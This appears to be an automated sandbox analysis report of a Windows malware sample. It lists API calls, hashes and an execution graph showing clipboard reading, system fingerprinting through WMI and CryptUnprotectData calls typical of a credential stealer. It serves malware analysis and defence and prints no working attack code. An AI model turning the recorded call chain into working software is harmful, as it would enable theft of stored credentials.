                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0f025c7ba3bafae7c8a973c8a816fff08e584b73a5314f0f1d11f6ea75dd075b
                                                                                                          • Instruction ID: 0746a24e70a9f7ec5d4e13d3ee71d6b49c3cfcc826e607b516846784251cd75b
                                                                                                          • Opcode Fuzzy Hash: 0f025c7ba3bafae7c8a973c8a816fff08e584b73a5314f0f1d11f6ea75dd075b
                                                                                                          • Instruction Fuzzy Hash: 96217F31600619AFCB50EFA59C95EBB77AAEF01374715451DF81DDB250EB30EC4187A0
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 006DC5E6
                                                                                                            • Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006DC61E
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006DC63E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 158306478-0
                                                                                                          • Opcode ID: 3aaa3ff261eb311fd13bb455cad195ef72e86dd6372f00e01150b13924b8e4ad
                                                                                                          • Instruction ID: c5b140bd517cf8cf70587aa988c3a9bdcd732e4bc69769815be370171150857c
                                                                                                          • Opcode Fuzzy Hash: 3aaa3ff261eb311fd13bb455cad195ef72e86dd6372f00e01150b13924b8e4ad
                                                                                                          • Instruction Fuzzy Hash: 0E1104A1D01A9A7FA72127715CCACBF79AEDE893A4750241AF802D1300FE60CD0195B9
                                                                                                          APIs
                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000), ref: 006E4417
                                                                                                          • GetLastError.KERNEL32(?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?,?,?,006DD0F6,?), ref: 006E4423
                                                                                                            • Part of subcall function 006E4480: CloseHandle.KERNEL32(FFFFFFFE,006E4433,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?,?), ref: 006E4490
                                                                                                          • ___initconout.LIBCMT ref: 006E4433
                                                                                                            • Part of subcall function 006E4455: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006E43F1,006E38DC,?,?,006DD7B0,?,00000000,00000000,?), ref: 006E4468
                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?), ref: 006E4448
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                          • String ID:
                                                                                                          • API String ID: 2744216297-0
                                                                                                          • Opcode ID: e3dce4ac7ba4bdde20ecc7810362184170dd5668e782ff9244aeb63bd1ce6405
                                                                                                          • Instruction ID: 0c1f85e47bf4f20877443e6ee56a867ac57e95673ff62e1f11f77bed4cc0a3ec
                                                                                                          • Opcode Fuzzy Hash: e3dce4ac7ba4bdde20ecc7810362184170dd5668e782ff9244aeb63bd1ce6405
                                                                                                          • Instruction Fuzzy Hash: 12F03736201294FBCF531FE5EC44A993FA7FB493A4B055010FA1889170CB338960DB95
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
                                                                                                            • Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660
                                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,006CF869,?,?,?,00000055,?,-00000050,?,?,?), ref: 006D9E55
                                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,006CF869,?,?,?,00000055,?,-00000050,?,?), ref: 006D9E8C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                                          • String ID: utf8
                                                                                                          • API String ID: 943130320-905460609
                                                                                                          • Opcode ID: e5d19edca31601c55c81d55c9cfb06d86d529aeaf0f6c11d5840ddfdc6f38a55
                                                                                                          • Instruction ID: d568eb450087bfefaa26ed2ce6ba0fbe2614a824aee537a3ed82de95c5dcadca
                                                                                                          • Opcode Fuzzy Hash: e5d19edca31601c55c81d55c9cfb06d86d529aeaf0f6c11d5840ddfdc6f38a55
                                                                                                          • Instruction Fuzzy Hash: 9351C471E04301AADB69AB71CC42BF673ABAF45700F15052FF545DB381EB70D98096B5
                                                                                                          APIs
                                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006D4CE1,?,?,00000000,00000000,00000000,?), ref: 006D4E05
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EncodePointer
                                                                                                          • String ID: MOC$RCC
                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                          • Opcode ID: 4ed9aac59775e8f91cb6c90ac09c3834c9d203e7bd6d01498e867e50e6fa7db5
                                                                                                          • Instruction ID: 40d8cde3cf1dd708f04527163ec683459525edcb8dba508aa544db83d4dcdd5c
                                                                                                          • Opcode Fuzzy Hash: 4ed9aac59775e8f91cb6c90ac09c3834c9d203e7bd6d01498e867e50e6fa7db5
                                                                                                          • Instruction Fuzzy Hash: ED413571D00209ABCF15DF98D881AEEBBB6BF48304F18415AF908A7361DB359D51DB50
                                                                                                          APIs
                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 006D48C3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___except_validate_context_record
                                                                                                          • String ID: csm$csm
                                                                                                          • API String ID: 3493665558-3733052814
                                                                                                          • Opcode ID: 66f928c3ee2d8d89342088f00f05e1e27eda8634cef8f581566b28d6278b0ef3
                                                                                                          • Instruction ID: 3a70ef5a1311adbc7e33400e1a3849bf5b85b60e05d6158528c57efbdcce4137
                                                                                                          • Opcode Fuzzy Hash: 66f928c3ee2d8d89342088f00f05e1e27eda8634cef8f581566b28d6278b0ef3
                                                                                                          • Instruction Fuzzy Hash: 5C3181329002199BCF269F56C8949AB7BA7FB09315B18459BF8985D321CB33DC61DB81
                                                                                                          APIs
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006C3A1E
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006C3A49
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                          • String ID: w2l
                                                                                                          • API String ID: 593203224-126607045
                                                                                                          • Opcode ID: e09e9715871709a4115ee56a61967d188497bff2ea39774ff1ed7beff0139fff
                                                                                                          • Instruction ID: 56b32f82c41ffb9ceb60bfb108dcd0a32ec55245e485ea997930840757c885cd
                                                                                                          • Opcode Fuzzy Hash: e09e9715871709a4115ee56a61967d188497bff2ea39774ff1ed7beff0139fff
                                                                                                          • Instruction Fuzzy Hash: E101C0B0D04208DFCB44EFA8D881BADBBB1FB08300F8054ADE416AB351DB306A54CF55

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.2%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:55%
                                                                                                          Total number of Nodes:313
                                                                                                          Total number of Limit Nodes:24
                                                                                                          execution_graph 30469 408640 30471 40864f 30469->30471 30470 4088e6 ExitProcess 30471->30470 30472 408664 GetCurrentProcessId GetCurrentThreadId 30471->30472 30481 4088ca 30471->30481 30473 408690 SHGetSpecialFolderPathW 30472->30473 30474 40868c 30472->30474 30475 408770 30473->30475 30474->30473 30475->30475 30482 43bc90 30475->30482 30477 408797 GetForegroundWindow 30479 408811 30477->30479 30479->30481 30485 40c660 CoInitializeEx 30479->30485 30481->30470 30486 43f000 30482->30486 30484 43bc9a RtlAllocateHeap 30484->30477 30487 43f010 30486->30487 30487->30484 30487->30487 30488 42b842 30489 42b84e 30488->30489 30490 42b90b GetComputerNameExA 30489->30490 30491 42b946 30490->30491 30491->30491 30492 42c282 30493 42c28c 30492->30493 30494 42c34d GetPhysicallyInstalledSystemMemory 30493->30494 30495 42c390 30494->30495 30496 40dc41 30497 40dc51 30496->30497 30526 4237d0 30497->30526 30499 40dc77 30539 423a60 30499->30539 30501 40dc97 30552 425850 30501->30552 30507 40dcc9 30587 427cb0 30507->30587 30509 40dcf2 30599 432d70 OpenClipboard 30509->30599 30511 40dd1b 30512 4237d0 5 API calls 30511->30512 30513 40dd56 30512->30513 30514 423a60 4 API calls 30513->30514 30515 40dd76 30514->30515 30516 425850 4 API calls 30515->30516 30517 40dd96 30516->30517 30518 426000 3 API calls 30517->30518 30519 40dd9f 30518->30519 30520 426340 3 API calls 30519->30520 30521 40dda8 30520->30521 30522 427cb0 3 API calls 30521->30522 30523 40ddd1 30522->30523 30524 432d70 6 API calls 30523->30524 30525 40ddfa 30524->30525 30527 423860 30526->30527 30527->30527 30528 423876 RtlExpandEnvironmentStrings 30527->30528 30531 4238c0 30528->30531 30529 42395e 30609 41ef80 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30529->30609 30531->30529 30533 423bf1 30531->30533 30534 423939 RtlExpandEnvironmentStrings 30531->30534 30537 423a3b 30531->30537 30610 43fe20 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30531->30610 30611 43fb80 30533->30611 30534->30529 30534->30531 30534->30533 30534->30537 30536 423c2a 30536->30537 30621 43fa50 30536->30621 30537->30499 30540 423a6e 30539->30540 30541 43fa50 LdrInitializeThunk 30540->30541 30544 423922 30541->30544 30543 42395e 30632 41ef80 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30543->30632 30544->30543 30545 423bf1 30544->30545 30548 423939 RtlExpandEnvironmentStrings 30544->30548 30551 423a3b 30544->30551 30633 43fe20 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30544->30633 30547 43fb80 3 API calls 30545->30547 30549 423c2a 30547->30549 30548->30543 30548->30544 30548->30545 30548->30551 30550 43fa50 LdrInitializeThunk 30549->30550 30549->30551 30550->30549 30551->30501 30553 425ad0 30552->30553 30557 425876 30552->30557 30560 425b04 30552->30560 30561 40dcb7 30552->30561 30634 43d880 30553->30634 30555 43fa50 LdrInitializeThunk 30555->30560 30557->30553 30558 43fa50 LdrInitializeThunk 30557->30558 30557->30560 30557->30561 30653 43fe20 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30557->30653 30558->30557 30559 43fb80 3 API calls 30559->30560 30560->30555 30560->30559 30560->30561 30563 43d910 LdrInitializeThunk 30560->30563 30643 440480 30560->30643 30564 426000 30561->30564 30563->30560 30565 426020 30564->30565 30567 42606e 30565->30567 30656 43d910 LdrInitializeThunk 30565->30656 30566 40dcc0 30574 426340 30566->30574 30567->30566 30569 43bc90 RtlAllocateHeap 30567->30569 30571 4260e1 30569->30571 30570 43bcb0 RtlFreeHeap 30570->30566 30573 42614e 30571->30573 30657 43d910 LdrInitializeThunk 30571->30657 30573->30570 30658 426360 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30574->30658 30576 426354 30576->30507 30577 426349 30577->30576 30659 4398a0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30577->30659 30582 426f6f 30671 43d910 LdrInitializeThunk 30582->30671 30583 426c18 30583->30582 30583->30583 30585 426d75 30583->30585 30586 426c42 30583->30586 30666 4409e0 30583->30666 30585->30582 30585->30586 30660 440e50 30585->30660 30670 440d70 LdrInitializeThunk 30585->30670 30586->30507 30588 427d60 30587->30588 30588->30588 30589 427d86 RtlExpandEnvironmentStrings 30588->30589 30590 427de0 30589->30590 30591 427e5b 30590->30591 30592 427e38 RtlExpandEnvironmentStrings 30590->30592 30593 427e75 30590->30593 30595 428120 30590->30595 30591->30509 30592->30591 30592->30593 30592->30595 30593->30591 30593->30595 30597 428258 30593->30597 30675 440d70 LdrInitializeThunk 30593->30675 30595->30595 30596 4409e0 LdrInitializeThunk 30595->30596 30596->30597 30597->30597 30598 4409e0 LdrInitializeThunk 30597->30598 30598->30597 30600 432d95 30599->30600 30601 432d9a GetClipboardData 30599->30601 30600->30511 30602 432db7 GlobalLock 30601->30602 30603 432fc8 CloseClipboard 30601->30603 30604 432dd1 30602->30604 30606 432dd6 30602->30606 30603->30600 30604->30603 30605 432fb8 GlobalUnlock 30605->30604 30606->30605 30607 432e0e GetWindowLongW 30606->30607 30608 432e78 30607->30608 30608->30605 30609->30537 30610->30531 30612 43fba0 30611->30612 30613 43fc0e 30612->30613 30625 43d910 LdrInitializeThunk 30612->30625 30615 43bc90 RtlAllocateHeap 30613->30615 30619 43fe08 30613->30619 30616 43fc7a 30615->30616 30620 43fd0e 30616->30620 30626 43d910 LdrInitializeThunk 30616->30626 30619->30536 30620->30620 30627 43bcb0 30620->30627 30622 43fa70 30621->30622 30624 43fb4f 30622->30624 30631 43d910 LdrInitializeThunk 30622->30631 30624->30536 30625->30613 30626->30620 30628 43bcd4 30627->30628 30629 43bcc3 30627->30629 30628->30619 30630 43bcc8 RtlFreeHeap 30629->30630 30630->30628 30631->30624 30632->30551 30633->30544 30635 43d8e5 30634->30635 30636 43d899 30634->30636 30637 43bc90 RtlAllocateHeap 30635->30637 30638 43d8e3 30636->30638 30639 43d8f0 30636->30639 30640 43d8d0 RtlReAllocateHeap 30636->30640 30642 43d8a7 30636->30642 30637->30638 30638->30560 30641 43bcb0 RtlFreeHeap 30639->30641 30640->30638 30641->30638 30642->30640 30644 44048f 30643->30644 30645 4405ef 30644->30645 30654 43d910 LdrInitializeThunk 30644->30654 30646 43bc90 RtlAllocateHeap 30645->30646 30651 44080f 30645->30651 30648 440675 30646->30648 30650 44074e 30648->30650 30655 43d910 LdrInitializeThunk 30648->30655 30649 43bcb0 RtlFreeHeap 30649->30651 30650->30649 30651->30560 30653->30557 30654->30645 30655->30650 30656->30567 30657->30573 30658->30577 30659->30583 30662 440e70 30660->30662 30661 440f9e 30661->30585 30664 440ede 30662->30664 30672 43d910 LdrInitializeThunk 30662->30672 30664->30661 30673 43d910 LdrInitializeThunk 30664->30673 30668 440a00 30666->30668 30667 440b4e 30667->30585 30668->30667 30674 43d910 LdrInitializeThunk 30668->30674 30670->30585 30671->30586 30672->30664 30673->30661 30674->30667 30675->30593 30676 43db42 30677 43db70 30676->30677 30678 43dbce 30677->30678 30683 43d910 LdrInitializeThunk 30677->30683 30682 43d910 LdrInitializeThunk 30678->30682 30681 43dcd1 30682->30681 30683->30678 30684 4209c0 30685 420a20 30684->30685 30686 4209ce 30684->30686 30688 420ae0 30686->30688 30690 420af0 30688->30690 30690->30690 30692 440ba0 30690->30692 30691 420bbf 30693 440bc0 30692->30693 30694 440d1e 30693->30694 30696 43d910 LdrInitializeThunk 30693->30696 30694->30691 30696->30694 30697 436805 30698 43681d 30697->30698 30699 436831 GetUserDefaultUILanguage 30698->30699 30700 436858 30699->30700 30701 42de0c 30704 414110 30701->30704 30703 42de11 CoSetProxyBlanket 30704->30703 30705 42b94d 30706 42b959 30705->30706 30706->30706 30707 42ba3b GetComputerNameExA 30706->30707 30708 4229cd 30709 422aa0 30708->30709 30710 4229e0 30708->30710 30710->30709 30716 422fcf 30710->30716 30722 422b58 30710->30722 30711 422d9c 30711->30711 30712 422def 30711->30712 30713 4231c0 RtlExpandEnvironmentStrings 30711->30713 30721 423210 30713->30721 30714 4235e1 30729 421060 30714->30729 30715 423420 30715->30714 30720 4232b4 30715->30720 30727 423448 30715->30727 30745 43d910 LdrInitializeThunk 30716->30745 30721->30714 30721->30715 30721->30720 30723 42328c RtlExpandEnvironmentStrings 30721->30723 30725 4232dc 30721->30725 30721->30727 30722->30711 30722->30712 30744 43d910 LdrInitializeThunk 30722->30744 30723->30714 30723->30715 30723->30720 30723->30725 30723->30727 30724 423591 GetLogicalDrives 30728 440ba0 LdrInitializeThunk 30724->30728 30725->30725 30726 440ba0 LdrInitializeThunk 30725->30726 30726->30715 30727->30724 30727->30727 30728->30720 30730 4409e0 LdrInitializeThunk 30729->30730 30732 4210a3 30730->30732 30731 42184f 30731->30720 30732->30731 30733 43bc90 RtlAllocateHeap 30732->30733 30734 4210e1 30733->30734 30742 421199 30734->30742 30746 43d910 LdrInitializeThunk 30734->30746 30735 421789 30737 43bcb0 RtlFreeHeap 30735->30737 30739 42179b 30737->30739 30738 43bc90 RtlAllocateHeap 30738->30742 30739->30731 30748 43d910 LdrInitializeThunk 30739->30748 30742->30735 30742->30738 30743 43bcb0 RtlFreeHeap 30742->30743 30747 43d910 LdrInitializeThunk 30742->30747 30743->30742 30744->30722 30745->30712 30746->30734 30747->30742 30748->30739 30749 43e19a 30751 43e1a2 30749->30751 30750 43e21e 30751->30750 30753 43d910 LdrInitializeThunk 30751->30753 30753->30750 30754 409d5e 30755 409d80 30754->30755 30755->30755 30756 409e16 LoadLibraryExW 30755->30756 30757 409e27 30756->30757 30758 435edd 30761 435f00 30758->30761 30759 435f47 30761->30759 30762 43d910 LdrInitializeThunk 30761->30762 30762->30761 30763 40c69e CoInitializeSecurity 30769 419362 30770 419380 30769->30770 30774 4193ee 30770->30774 30775 43d910 LdrInitializeThunk 30770->30775 30772 41933a 30773 4197d1 CryptUnprotectData 30773->30774 30774->30772 30774->30773 30775->30774 30776 43bce0 30777 43bd00 30776->30777 30779 43bd5e 30777->30779 30786 43d910 LdrInitializeThunk 30777->30786 30778 43bf5e 30779->30778 30780 43bc90 RtlAllocateHeap 30779->30780 30783 43be0f 30780->30783 30782 43bcb0 RtlFreeHeap 30782->30778 30785 43be8f 30783->30785 30787 43d910 LdrInitializeThunk 30783->30787 30785->30782 30786->30779 30787->30785 30788 433767 30789 43377d 30788->30789 30792 433960 30789->30792 30793 43399d GetObjectW 30792->30793 30795 433aaa 30793->30795 30796 43e6a5 GetForegroundWindow 30797 43e6b3 30796->30797 30798 43dce9 30799 43dd10 30798->30799 30799->30799 30802 43dd6e 30799->30802 30804 43d910 LdrInitializeThunk 30799->30804 30800 43e21e 30802->30800 30805 43d910 LdrInitializeThunk 30802->30805 30804->30802 30805->30800 30806 418df1 30807 418fbd 30806->30807 30808 418dfd 30806->30808 30809 440ba0 LdrInitializeThunk 30808->30809 30809->30807 30810 4316b2 CoSetProxyBlanket 30816 4384f0 30817 438515 30816->30817 30820 4385f2 30817->30820 30825 43d910 LdrInitializeThunk 30817->30825 30819 4387f0 30820->30819 30822 4386e7 30820->30822 30824 43d910 LdrInitializeThunk 30820->30824 30822->30819 30826 43d910 LdrInitializeThunk 30822->30826 30824->30820 30825->30817 30826->30822 30827 42c736 30829 42c770 30827->30829 30828 42c89e 30829->30828 30831 43d910 LdrInitializeThunk 30829->30831 30831->30828 30832 40e875 30837 432fe0 30832->30837 30838 433015 GetSystemMetrics GetSystemMetrics 30837->30838 30839 433058 30838->30839 30840 40d6f8 30841 40d720 30840->30841 30844 438860 30841->30844 30843 40d88d 30843->30843 30845 438890 CoCreateInstance 30844->30845 30847 438ed5 30845->30847 30848 438af5 SysAllocString 30845->30848 30850 438ee5 GetVolumeInformationW 30847->30850 30851 438b83 30848->30851 30859 438f03 30850->30859 30852 438ec5 SysFreeString 30851->30852 30853 438b8b CoSetProxyBlanket 30851->30853 30852->30847 30854 438ebb 30853->30854 30855 438bab SysAllocString 30853->30855 30854->30852 30857 438c70 30855->30857 30857->30857 30858 438ca8 SysAllocString 30857->30858 30861 438ccf 30858->30861 30859->30843 30860 438ea9 SysFreeString SysFreeString 30860->30854 30861->30860 30862 438e9f 30861->30862 30863 438d17 VariantInit 30861->30863 30862->30860 30865 438d70 30863->30865 30864 438e8e VariantClear 30864->30862 30865->30864

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 438860-438889 1 438890-4388c2 0->1 1->1 2 4388c4-4388d9 1->2 3 4388e0-438912 2->3 3->3 4 438914-438954 3->4 5 438960-438988 4->5 5->5 6 43898a-4389a3 5->6 8 4389a5-4389af 6->8 9 438a1a-438a23 6->9 11 4389b0-4389c9 8->11 10 438a30-438a96 9->10 10->10 13 438a98-438aef CoCreateInstance 10->13 11->11 12 4389cb-4389de 11->12 14 4389e0-438a0e 12->14 15 438ed5-438f01 call 43f450 GetVolumeInformationW 13->15 16 438af5-438b29 13->16 14->14 17 438a10-438a15 14->17 22 438f03-438f07 15->22 23 438f0b-438f0d 15->23 18 438b30-438b59 16->18 17->9 18->18 20 438b5b-438b85 SysAllocString 18->20 28 438ec5-438ed1 SysFreeString 20->28 29 438b8b-438ba5 CoSetProxyBlanket 20->29 22->23 24 438f1d-438f28 23->24 26 438f34-438f46 24->26 27 438f2a-438f31 24->27 30 438f50-438fb0 26->30 27->26 28->15 31 438ebb-438ec1 29->31 32 438bab-438bbb 29->32 30->30 33 438fb2-438fe7 30->33 31->28 34 438bc0-438be3 32->34 35 438ff0-43903a 33->35 34->34 36 438be5-438c65 SysAllocString 34->36 35->35 37 43903c-43906d call 41dc90 35->37 38 438c70-438ca6 36->38 43 439070-439078 37->43 38->38 39 438ca8-438cd5 SysAllocString 38->39 44 438cdb-438cfd 39->44 45 438ea9-438eb9 SysFreeString * 2 39->45 43->43 46 43907a-43907c 43->46 52 438d03-438d06 44->52 53 438e9f-438ea5 44->53 45->31 47 439082-439092 call 408060 46->47 48 438f10-438f17 46->48 47->48 48->24 49 439097-43909e 48->49 52->53 55 438d0c-438d11 52->55 53->45 55->53 56 438d17-438d62 VariantInit 55->56 57 438d70-438d99 56->57 57->57 58 438d9b-438dad 57->58 59 438db1-438db3 58->59 60 438db9-438dbf 59->60 61 438e8e-438e9b VariantClear 59->61 60->61 62 438dc5-438dd3 60->62 61->53 63 438dd5-438dda 62->63 64 438e0d 62->64 65 438dec-438df0 63->65 66 438e0f-438e4d call 407ed0 call 408d20 64->66 67 438df2-438dfb 65->67 68 438de0 65->68 77 438e4f-438e65 66->77 78 438e7d-438e8a call 407ee0 66->78 71 438e02-438e06 67->71 72 438dfd-438e00 67->72 70 438de1-438dea 68->70 70->65 70->66 71->70 74 438e08-438e0b 71->74 72->70 74->70 77->78 80 438e67-438e74 77->80 78->61 80->78 82 438e76-438e79 80->82 82->78
                                                                                                          APIs
                                                                                                          • CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438AE7
                                                                                                          • SysAllocString.OLEAUT32(k2`0), ref: 00438B60
                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B9D
